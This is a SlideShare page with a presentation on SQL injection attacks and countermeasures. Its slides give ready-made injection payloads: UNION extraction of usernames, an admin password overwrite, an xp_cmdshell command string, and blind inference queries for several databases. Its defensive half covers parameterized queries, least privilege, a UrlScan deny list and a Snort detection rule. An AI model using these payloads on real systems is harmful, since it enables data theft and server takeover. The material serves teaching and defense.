SlideShare uma empresa Scribd logo

Web application attacks using Sql injection and countermasures

Transferir como PPT, PDF
Cade Zvavanjanja
Cade Zvavanjanja

An advanced technical presentation on attacking Web applications using sql injection technique and the countermeasures.

Tecnologia
1 de 49
SQL INJECTION ATTACKS Cade Zvavanjanja CISO Gainful Information Security Introduction Background Techniques Prevention Demo Conclusions Questions
OUTLINE  Background of SQL Injection  Techniques and Examples  Preventing SQL Injection  Demo  Wrap-Up  Questions Introduction Background Techniques Prevention Demo Conclusions Questions
BACKGROUND OF SQL INJECTION Introduction Background Techniques Prevention Demo Conclusions Questions
DATABASES: WHERE ARE THEY NOW? Fat Server Fat Client Fat Server & Fat Client Mainframes X Desktop Apps X Web Apps X Introduction Background Techniques Prevention Demo Conclusions Questions
WHY IS SQL A STANDARD? Relational Database Platform Runtime Loose Interpretation Independence Semantics Introduction Background Techniques Prevention Demo Conclusions Questions
FLEXIBILITY = VULNERABILITY  Simple Injection  Decoding Error Messages  Blind Injection  Encoding Exploits  Stored Procedures ---  Programmer Error (Faulty Logic) Introduction Background Techniques Prevention Demo Conclusions Questions
SQL Injection Techniques Introduction Background Techniques Prevention Demo Conclusions Questions
IMPORTANT SYMBOLS ‘  “Hack” --  “Comment Out” ;  “End Statement” %,*  “Wildcards”
SQL INJECTION DEFINITION The input field is modified in such a way that the Database returns unintended data. Sql: SELECT <column name> FROM <Table name> WHERE <logic expression>
EXAMPLE: DATABASE SCHEMA  Table Users  Has columns “username” and “password”  Accessed when users log in  Table Customers  Has column “phone”  Users can look up other customer phone numbers by name  Application does no input validation Introduction Background Techniques Prevention Demo Conclusions Questions
RETURNING EXTRA ROWS WITH “UNION”  Query: SELECT phone FROM Customers WHERE last_name = ‘<name>’  Input: x’ UNION SELECT username FROM users WHERE ‘x’ = ‘x Introduction Background Techniques Prevention Demo Conclusions Questions
MODIFYING RECORDS  Application has password changing page  SQL: UPDATE users SET password = ‘<newpassword>’ WHERE username = ‘<username>’  Input: newpassword’ WHERE username LIKE ‘%admin%’ -- Introduction Background Techniques Prevention Demo Conclusions Questions
MS SQL SERVER  Default SQL Server setup  Defaultsystem admin account “sa” enabled  No password!!!  Supports multiple queries  “Extended stored procedures”: C/C++ DLL files  Read/writeexternal files  Access command line Introduction Background Techniques Prevention Demo Conclusions Questions
EXPLOITING SQL SERVER  Use phone look-up query again: SELECT phone FROM customers WHERE last_name = ‘<name>’  Input: '; exec master..xp_cmdshell 'iisreset'; -- Introduction Background Techniques Prevention Demo Conclusions Questions
DATA-MINING WITH SQL INJECTION  Three classes of data-mining  In-band  Out-of-band  Inference
IN-BAND ATTACKS  Data is included in response from the web server  Could be a well rendered web page  Using UNION SELECTS  Error messages
OUT-OF-BAND ATTACKS  Data is retrieved using another communication channel:  UTL_HTTP.REQUEST  OPENROWSET  XP_SENDMAIL
INFERENCE ATTACKS  At the core of inference is a question  Action taken based upon the answer  Chris Anley’s time delay: declare @s varchar(8000) select @s = db_name() if (ascii(substring(@s, 1, 1)) & ( power(2, 0))) > 0 waitfor delay '0:0:5'
INFERENCE ATTACKS…CONT:  Examples:  Time Delay  Generate 200/500 responses  Response Variation  Wildly Silly Example – send mail to tech support of XYZ Corp about modem problem or monitor problem – if the call comes about a modem problem we know the answer
INFERENCE ATTACKS…CONT:  CASE statements in SQL: SELECT CASE WHEN condition THEN do_one_thing ELSE do_another END
INFERENCE THROUGH WEB SERVER RESPONSE CODES  Need query that will compile fine but generate error on branch execution: SELECT CASE WHEN condition THEN 1 ELSE 1/0 END
INFERENCE THROUGH WEB SERVER RESPONSE CODES…CONT:  Notes:  Works well with SQL Server, Oracle, DB2  MySQL returns NULL  Informix ODBC driver returns 200 – even in event of error  Response code could be 302 Redirect, etc – principle is the same.  Leaves a large number of 500 response in log files  App Environments like PL/SQL will return 404 instead of 500
INFERENCE THROUGH RESPONSE VARIATIONS:  Parameter Splitting and Balancing  Avoids 500 responses
PARAMETER SPLITTING AND BALANCING  ‘NGSSOFTWARE’  ‘NGSSOFTWA’+’RE’  ‘NGSSOFTWA’||’RE’  ‘NGSSOFTWA’|| (SUBSELECT RETURNS R) || ‘E’  ‘NGSSOFTWA’ + (SUBSELECT RETURNS R) + ‘E’  2 1 +1  1 + (SUBSELECT RETURNS 1)
DEALING WITH VARIOUS APPLICATION ENVIRONMENTS  Cold Fusion Management  Converts “ to &quot;  Converts & to &amp;  Converts > to &gt;  Converts < to &lt;  Doubles up single quotes  Usually means attack vector is numeric input  PHP often doubles single quote – magic quotes
DEALING WITH VARIOUS APPLICATION ENVIRONMENTS… CONT:  Rather than > use BETWEEN X AND Y  Rather than & use ^ A xor BIT = C  if C is greater than A then Bit is not set  If C is less than A then Bit is set  Rather than ‘A’ use CHR(65)/CHAR(65)
INFERENCE QUERIES…  SQL Server – String data ' + (select case when ascii(substring((sub-query),the_byte,1))^the_bit between 0 and ascii(substring((sub- query),the_byte,1)) then char(known_value) else char(1/0) end) + '
INFERENCE QUERIES…  Oracle – Numeric + (select case when bitand(ascii(substr((sub-query),the_byte,1)), the_bit) between 1 and 255 then 0 else 1/0 end from dual)
INFERENCE QUERIES…  Oracle – String data '|| (select case when bitand(ascii(substr((sub-query),the_byte,1)), the_bit) between 1 and 255 then chr(known_val) else chr(1/0) end from dual) ||'
INFERENCE QUERIES…  MySQL – Numeric + (select case when (ascii(substring((sub- query),the_byte,1))^the_bit) between 0 and ascii(substring((sub-query),the_byte,1)) then 0 else 1 end (uses page response variation)
INFERENCE QUERIES…  MySQL – String Data ' + (select case when (ascii(substring((sub- query),the_byte,1))^the_bit) between 0 and ascii(substring((sub-query),the_byte,1)) then 0 else 1 end) + ‘ (one returns no recordset – the other returns all rows)
INFERENCE QUERIES…  Informix – Numeric + (select distinct case when bitval((SELECT distinct DECODE((select distinct (substr((sub-query),the_byte,1)) from sysmaster:informix.systables),"{",123,"|",124,"}",125,"~",12 6,"!",33,"$",36,"(",40,")",41,"*",42,",",44,"-",45,".",46,"/",47," ",32,":",58,";",59,"_",95,"",92,".",46,"?",63,"-",45,"0",48,"1", 49,"2",50,"3",51,"4",52,"5",53,"6",54,"7",55,"8",56,"9",57,"@", 64,"A",65,"B",66,"C",67,"D",68,"E",69,"F",70,"G",71,"H",72," I",73,"J",74,"K",75,"L",76,"M",77,"N",78,"O",79,"P",80,"Q",8 1,"R",82,"S",83,"T",84,"U",85,"V",86,"W",87,"X",88,"Y",89,"Z ",90,"a",97,"b",98,"c",99,"d",100,"e",101,"f",102,"g",103,"h",1 04,"i",105,"j",106,"k",107,"l",108,"m",109,"n",110,"o",111,"p", 112,"q",113,"r",114,"s",115,"t",116,"u",117,"v",118,"w",119," x",120,"y",121,"z",122,63) from sysmaster:informix.systables),the_bit) between 1 and 255 then 1 else (1/bitval(2,1)) end from sysmaster:informix.systables)-1
INFERENCE QUERIES…  Informix – String data ' || (select distinct case when bitval((SELECT distinct DECODE((select distinct (substr((sub-query),the_byte,1)) from sysmaster:informix.systables),"{",123,"|",124,"}",125,"~",12 6,"!",33,"$",36,"(",40,")",41,"*",42,",",44,"-",45,".",46,"/",47," ",32,":",58,";",59,"_",95,"",92,".",46,"?",63,"-",45,"0",48,"1", 49,"2",50,"3",51,"4",52,"5",53,"6",54,"7",55,"8",56,"9",57,"@", 64,"A",65,"B",66,"C",67,"D",68,"E",69,"F",70,"G",71,"H",72," I",73,"J",74,"K",75,"L",76,"M",77,"N",78,"O",79,"P",80,"Q",8 1,"R",82,"S",83,"T",84,"U",85,"V",86,"W",87,"X",88,"Y",89,"Z ",90,"a",97,"b",98,"c",99,"d",100,"e",101,"f",102,"g",103,"h",1 04,"i",105,"j",106,"k",107,"l",108,"m",109,"n",110,"o",111,"p", 112,"q",113,"r",114,"s",115,"t",116,"u",117,"v",118,"w",119," x",120,"y",121,"z",122,63) from sysmaster:informix.systables),the_bit) between 1 and 255 then 'xFC' else (1/bitval(2,1))::char end from sysmaster:informix.systables) ||'
PREVENTING SQL INJECTION Introduction Background Techniques Prevention Demo Conclusions Questions
PREVENTING SQL INJECTION Input Validation Input Checking Functions Access Rights User Permissions Variable Placeholders Stored Procedures Introduction Background Techniques Prevention Demo Conclusions Questions
INPUT VALIDATION  Checks  Type  Size  Format  Range  Replace quotation marks “All input is wrong and dangerous” Introduction Background Techniques Prevention Demo Conclusions Questions
INPUT CHECKING FUNCTIONS  Built in character rejection $sql = “SELECT * FROM Users WHERE ID = ‘” . $_GET[‘id’] . “’”; $sql = “SELECT * FROM Users WHERE ID =” . mysql_real_escape_string($_GET[‘id’] ); $result = mysql_query($sql); Introduction Background Techniques Prevention Demo Conclusions Questions
ACCESS RIGHTS Web User vs. System Administrator – ‘sa’ Introduction Background Techniques Prevention Demo Conclusions Questions
USER PERMISSIONS  Limit query access rights  SELECT  UPDATE  DROP  Restricted statement access  Global-specific  Database-specific  Table-specific Introduction Background Techniques Prevention Demo Conclusions Questions
VARIABLE PLACEHOLDERS (?)  Defense from String Concatenation  Enforcing database data types PreparedStatement prep = conn.prepareStatement("SELECT * FROM USERS WHERE PASSWORD=?"); prep.setString(1, pwd); Introduction Background Techniques Prevention Demo Conclusions Questions
STORED PROCEDURES  Use error checking variables  Buffer direct database access Introduction Background Techniques Prevention Demo Conclusions Questions
DEMONSTRATION Introduction Background Techniques Prevention Demo Conclusions Questions
COUNTERMEASURES  System Administrators  White List / Blacklist Input Validation  Least Privileges  Application firewalls  Developer  StoredProcedures  Parameterized queries  Exception handling
WHITELIST INPUT VALIDATION  UrlScan v3.0  restricts the types of HTTP requests that IIS will process [SQL Injection Headers] AppliesTo=.asp,.aspx [SQL Injection Headers Strings] -- @ ; also catches @@ alter delete drop exec insert alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"SQL Injection "; flow:to_server,established;  SNORT uricontent:".php | .aspx | .asp"; pcre:"/(%27)|(')|(--)|(%23)|(#)/i";  Create rule to check for SQL attack classtype:Web-application-attack; sid:9099; rev:5;)
LEAST PRIVILEGES  Enforce least privileges  CREATE / DELETE  Does not guarantee security  Access to portion of data  Create views
CONCLUSIONS  SQL Injection continues to evolve with new technologies  Dangerous Effects  Access to critical information  Updating data not meant to be updated  Exploiting DBMS to directly affect the server and its resources  Prevention of SQL Injection  Input Validation and Query Building  Permissions and Access Rights  Variable Placeholders (Prepare) and Stored Procedures Introduction Background Techniques Prevention Demo Conclusions Questions
QUESTIONS  1) What could prevent the ‘Students’ table from being dropped?  2) What is another way to prevent Injection? Introduction Background Techniques Prevention Demo Conclusions Questions
REFERENCES  Achour, Mehdi, Friedhelm Betz, Antony Dovgal, et al. "Chapter 27. Database Security." PHP Manual. 13 January 2005. PHP Documentation Group. 07 Apr. 2005 <http://www.php- center.de/en-html-manual/security.database.sql- injection.html>.  Dewdney, A. K. The New Turing Omnibus. New York: Henry Holt, 1989. 427-433.  "Exploits of a Mom." xkcd.com. 4 Mar. 2008 <http://xkcd.com/327/>.  Finnigan, Pete. " SQL Injection and Oracle, Part One ." SecurityFocus 21 November 2002. 07 Apr 2005 <http://www.securityfocus.com/infocus/1644>.  Harper, Mitchell. "SQL Injection Attacks: Are You Safe?." Dev Articles. 29 May. 2002. 07 Apr. 2005 <http://www.devarticles.com/c/a/MySQL/SQL-Injection- Attacks-Are-You-Safe/2/>. Introduction Background Techniques Prevention Demo Conclusions Questions
Thank You Tel: +236 733 782 490 +263 773 796 365 +263 -4- 733 117 Eml: info@gis.co.zw cade@gis.co.zw Web: www.gis.co.zw Introduction Background Techniques Prevention Demo Conclusions Questions

Recomendados

SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoPichaya Morimoto
 
Sql injection
Sql injectionSql injection
Sql injectionNikunj Dhameliya
 
SQL Injection Attacks cs586
SQL Injection Attacks cs586SQL Injection Attacks cs586
SQL Injection Attacks cs586Stacy Watts
 
SQL Injection
SQL Injection SQL Injection
SQL Injection Adhoura Academy
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENGDmitry Evteev
 
Sql injection
Sql injectionSql injection
Sql injectionNitish Kumar
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injectionashish20012
 
Sql injection attack
Sql injection attackSql injection attack
Sql injection attackRajKumar Rampelli
 

Recomendados

SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoPichaya Morimoto
 
Sql injection
Sql injectionSql injection
Sql injectionNikunj Dhameliya
 
SQL Injection Attacks cs586
SQL Injection Attacks cs586SQL Injection Attacks cs586
SQL Injection Attacks cs586Stacy Watts
 
SQL Injection
SQL Injection SQL Injection
SQL Injection Adhoura Academy
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENGDmitry Evteev
 
Sql injection
Sql injectionSql injection
Sql injectionNitish Kumar
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injectionashish20012
 
Sql injection attack
Sql injection attackSql injection attack
Sql injection attackRajKumar Rampelli
 
Sql injection
Sql injectionSql injection
Sql injectionHemendra Kumar
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionSina Manavi
 
SQL Injection Tutorial
SQL Injection TutorialSQL Injection Tutorial
SQL Injection TutorialMagno Logan
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injectionamiable_indian
 
SQL Injection Defense in Python
SQL Injection Defense in PythonSQL Injection Defense in Python
SQL Injection Defense in PythonPublic Broadcasting Service
 
Sql Injection Attacks Siddhesh
Sql Injection Attacks SiddheshSql Injection Attacks Siddhesh
Sql Injection Attacks SiddheshSiddhesh Bhobe
 
SQL Injection
SQL InjectionSQL Injection
SQL InjectionAbhinav Nair
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONMentorcs
 
SQL Injections (Part 1)
SQL Injections (Part 1)SQL Injections (Part 1)
SQL Injections (Part 1)n|u - The Open Security Community
 
What is advanced SQL Injection? Infographic
What is advanced SQL Injection? InfographicWhat is advanced SQL Injection? Infographic
What is advanced SQL Injection? InfographicJW CyberNerd
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testingNapendra Singh
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationRapid Purple
 
seminar report on Sql injection
seminar report on Sql injectionseminar report on Sql injection
seminar report on Sql injectionJawhar Ali
 
Sql Injection and XSS
Sql Injection and XSSSql Injection and XSS
Sql Injection and XSSMike Crabb
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersKrzysztof Kotowicz
 
Sql Injection Myths and Fallacies
Sql Injection Myths and FallaciesSql Injection Myths and Fallacies
Sql Injection Myths and FallaciesKarwin Software Solutions LLC
 
D:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql InjectionD:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql Injectionavishkarm
 
SQL Injection in action with PHP and MySQL
SQL Injection in action with PHP and MySQLSQL Injection in action with PHP and MySQL
SQL Injection in action with PHP and MySQLPradeep Kumar
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySandip Chaudhari
 
Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks Nuno Loureiro
 
Sql injection
Sql injectionSql injection
Sql injectionPallavi Biswas
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and preventionhelloanand
 

Mais conteúdo relacionado

Mais procurados

A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionSina Manavi
 
SQL Injection Tutorial
SQL Injection TutorialSQL Injection Tutorial
SQL Injection TutorialMagno Logan
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injectionamiable_indian
 
Sql Injection Attacks Siddhesh
Sql Injection Attacks SiddheshSql Injection Attacks Siddhesh
Sql Injection Attacks SiddheshSiddhesh Bhobe
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONMentorcs
 
What is advanced SQL Injection? Infographic
What is advanced SQL Injection? InfographicWhat is advanced SQL Injection? Infographic
What is advanced SQL Injection? InfographicJW CyberNerd
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testingNapendra Singh
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationRapid Purple
 
seminar report on Sql injection
seminar report on Sql injectionseminar report on Sql injection
seminar report on Sql injectionJawhar Ali
 
Sql Injection and XSS
Sql Injection and XSSSql Injection and XSS
Sql Injection and XSSMike Crabb
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersKrzysztof Kotowicz
 
D:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql InjectionD:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql Injectionavishkarm
 
SQL Injection in action with PHP and MySQL
SQL Injection in action with PHP and MySQLSQL Injection in action with PHP and MySQL
SQL Injection in action with PHP and MySQLPradeep Kumar
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySandip Chaudhari
 
Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks Nuno Loureiro
 

Mais procurados (20)

Sql injection
Sql injectionSql injection
Sql injection
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL Injection
 
SQL Injection Tutorial
SQL Injection TutorialSQL Injection Tutorial
SQL Injection Tutorial
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injection
 
SQL Injection Defense in Python
SQL Injection Defense in PythonSQL Injection Defense in Python
SQL Injection Defense in Python
 
Sql Injection Attacks Siddhesh
Sql Injection Attacks SiddheshSql Injection Attacks Siddhesh
Sql Injection Attacks Siddhesh
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
SQL Injections (Part 1)
SQL Injections (Part 1)SQL Injections (Part 1)
SQL Injections (Part 1)
 
What is advanced SQL Injection? Infographic
What is advanced SQL Injection? InfographicWhat is advanced SQL Injection? Infographic
What is advanced SQL Injection? Infographic
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testing
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint Presentation
 
seminar report on Sql injection
seminar report on Sql injectionseminar report on Sql injection
seminar report on Sql injection
 
Sql Injection and XSS
Sql Injection and XSSSql Injection and XSS
Sql Injection and XSS
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developers
 
Sql Injection Myths and Fallacies
Sql Injection Myths and FallaciesSql Injection Myths and Fallacies
Sql Injection Myths and Fallacies
 
D:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql InjectionD:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql Injection
 
SQL Injection in action with PHP and MySQL
SQL Injection in action with PHP and MySQLSQL Injection in action with PHP and MySQL
SQL Injection in action with PHP and MySQL
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and Security
 
Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks
 

Destaque

Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and preventionhelloanand
 
Sql injection
Sql injectionSql injection
Sql injectionZidh
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONAnoop T
 
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)Grand Parade Poland
 
Website attack n defacement n its control measures
Website attack n defacement n its control measures Website attack n defacement n its control measures
Website attack n defacement n its control measures أحلام انصارى
 
Sql Injection and Entity Frameworks
Sql Injection and Entity FrameworksSql Injection and Entity Frameworks
Sql Injection and Entity FrameworksRich Helton
 
Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacksKevin Kline
 
How to Become a Thought Leader in Your Niche
How to Become a Thought Leader in Your NicheHow to Become a Thought Leader in Your Niche
How to Become a Thought Leader in Your NicheLeslie Samuel
 
Web Application Security II - SQL Injection
Web Application Security II - SQL InjectionWeb Application Security II - SQL Injection
Web Application Security II - SQL InjectionMd Syed Ahamad
 
Can Security Vulnerability Disclosure Processes Be Responsible, Rational and ...
Can Security Vulnerability Disclosure Processes Be Responsible, Rational and ...Can Security Vulnerability Disclosure Processes Be Responsible, Rational and ...
Can Security Vulnerability Disclosure Processes Be Responsible, Rational and ...Larissa Shapiro
 
Protecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSSProtecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSSskyhawk133
 
SQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpSQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpMindfire Solutions
 

Destaque (16)

Sql injection
Sql injectionSql injection
Sql injection
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and prevention
 
Sql injection
Sql injectionSql injection
Sql injection
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
Sql injection attacks
Sql injection attacksSql injection attacks
Sql injection attacks
 
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
 
Website attack n defacement n its control measures
Website attack n defacement n its control measures Website attack n defacement n its control measures
Website attack n defacement n its control measures
 
SQL injection and SYN attack
SQL injection and SYN attackSQL injection and SYN attack
SQL injection and SYN attack
 
Sql Injection and Entity Frameworks
Sql Injection and Entity FrameworksSql Injection and Entity Frameworks
Sql Injection and Entity Frameworks
 
Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacks
 
How to Become a Thought Leader in Your Niche
How to Become a Thought Leader in Your NicheHow to Become a Thought Leader in Your Niche
How to Become a Thought Leader in Your Niche
 
Web Application Security II - SQL Injection
Web Application Security II - SQL InjectionWeb Application Security II - SQL Injection
Web Application Security II - SQL Injection
 
Can Security Vulnerability Disclosure Processes Be Responsible, Rational and ...
Can Security Vulnerability Disclosure Processes Be Responsible, Rational and ...Can Security Vulnerability Disclosure Processes Be Responsible, Rational and ...
Can Security Vulnerability Disclosure Processes Be Responsible, Rational and ...
 
Protecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSSProtecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSS
 
SQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpSQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads Up
 

Semelhante a Web application attacks using Sql injection and countermasures

Sql injection
Sql injectionSql injection
Sql injectionBee_Ware
 
Advanced sql injection
Advanced sql injectionAdvanced sql injection
Advanced sql injectionbadhanbd
 
A Designer's Favourite Security and Privacy Features in SQL Server and Azure ...
A Designer's Favourite Security and Privacy Features in SQL Server and Azure ...A Designer's Favourite Security and Privacy Features in SQL Server and Azure ...
A Designer's Favourite Security and Privacy Features in SQL Server and Azure ...Karen Lopez
 
Advanced_SQL_ISASasASasaASnjection (1).ppt
Advanced_SQL_ISASasASasaASnjection (1).pptAdvanced_SQL_ISASasASasaASnjection (1).ppt
Advanced_SQL_ISASasASasaASnjection (1).pptssuserde23af
 
Php classes in mumbai
Php classes in mumbaiPhp classes in mumbai
Php classes in mumbaiaadi Surve
 
Designer's Favorite New Features in SQLServer
Designer's Favorite New Features in SQLServerDesigner's Favorite New Features in SQLServer
Designer's Favorite New Features in SQLServerKaren Lopez
 
Database design i_-_1_dl300
Database design i_-_1_dl300Database design i_-_1_dl300
Database design i_-_1_dl300KOI Lastone
 
SQL Injection: Amplifying Data Leakeage
SQL Injection: Amplifying Data LeakeageSQL Injection: Amplifying Data Leakeage
SQL Injection: Amplifying Data LeakeageUlisses Castro
 
Advanced SQL - Database Access from Programming Languages
Advanced SQL - Database Access from Programming LanguagesAdvanced SQL - Database Access from Programming Languages
Advanced SQL - Database Access from Programming LanguagesS.Shayan Daneshvar
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack webhostingguy
 
SQLCLR For DBAs and Developers
SQLCLR For DBAs and DevelopersSQLCLR For DBAs and Developers
SQLCLR For DBAs and Developerswebhostingguy
 
Dr. Jekyll and Mr. Hyde
Dr. Jekyll and Mr. HydeDr. Jekyll and Mr. Hyde
Dr. Jekyll and Mr. Hydewebhostingguy
 
2° Ciclo Microsoft CRUI 3° Sessione: l'evoluzione delle piattaforme tecnologi...
2° Ciclo Microsoft CRUI 3° Sessione: l'evoluzione delle piattaforme tecnologi...2° Ciclo Microsoft CRUI 3° Sessione: l'evoluzione delle piattaforme tecnologi...
2° Ciclo Microsoft CRUI 3° Sessione: l'evoluzione delle piattaforme tecnologi...Jürgen Ambrosi
 
Chapter 14 sql injection
Chapter 14 sql injectionChapter 14 sql injection
Chapter 14 sql injectionnewbie2019
 

Semelhante a Web application attacks using Sql injection and countermasures (20)

Sql
SqlSql
Sql
 
Sq linjection
Sq linjectionSq linjection
Sq linjection
 
SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1
 
Sql injection
Sql injectionSql injection
Sql injection
 
Advanced sql injection
Advanced sql injectionAdvanced sql injection
Advanced sql injection
 
Sql injection
Sql injectionSql injection
Sql injection
 
A Designer's Favourite Security and Privacy Features in SQL Server and Azure ...
A Designer's Favourite Security and Privacy Features in SQL Server and Azure ...A Designer's Favourite Security and Privacy Features in SQL Server and Azure ...
A Designer's Favourite Security and Privacy Features in SQL Server and Azure ...
 
Sql Injection V.2
Sql Injection V.2Sql Injection V.2
Sql Injection V.2
 
Advanced_SQL_ISASasASasaASnjection (1).ppt
Advanced_SQL_ISASasASasaASnjection (1).pptAdvanced_SQL_ISASasASasaASnjection (1).ppt
Advanced_SQL_ISASasASasaASnjection (1).ppt
 
Php classes in mumbai
Php classes in mumbaiPhp classes in mumbai
Php classes in mumbai
 
Designer's Favorite New Features in SQLServer
Designer's Favorite New Features in SQLServerDesigner's Favorite New Features in SQLServer
Designer's Favorite New Features in SQLServer
 
Database design i_-_1_dl300
Database design i_-_1_dl300Database design i_-_1_dl300
Database design i_-_1_dl300
 
SQL Injection: Amplifying Data Leakeage
SQL Injection: Amplifying Data LeakeageSQL Injection: Amplifying Data Leakeage
SQL Injection: Amplifying Data Leakeage
 
Advanced SQL - Database Access from Programming Languages
Advanced SQL - Database Access from Programming LanguagesAdvanced SQL - Database Access from Programming Languages
Advanced SQL - Database Access from Programming Languages
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack
 
SQLCLR For DBAs and Developers
SQLCLR For DBAs and DevelopersSQLCLR For DBAs and Developers
SQLCLR For DBAs and Developers
 
Dr. Jekyll and Mr. Hyde
Dr. Jekyll and Mr. HydeDr. Jekyll and Mr. Hyde
Dr. Jekyll and Mr. Hyde
 
Mutant Tests Too: The SQL
Mutant Tests Too: The SQLMutant Tests Too: The SQL
Mutant Tests Too: The SQL
 
2° Ciclo Microsoft CRUI 3° Sessione: l'evoluzione delle piattaforme tecnologi...
2° Ciclo Microsoft CRUI 3° Sessione: l'evoluzione delle piattaforme tecnologi...2° Ciclo Microsoft CRUI 3° Sessione: l'evoluzione delle piattaforme tecnologi...
2° Ciclo Microsoft CRUI 3° Sessione: l'evoluzione delle piattaforme tecnologi...
 
Chapter 14 sql injection
Chapter 14 sql injectionChapter 14 sql injection
Chapter 14 sql injection
 

Mais de Cade Zvavanjanja

Cade zvavanjanja saigf cybercrime &amp; security online
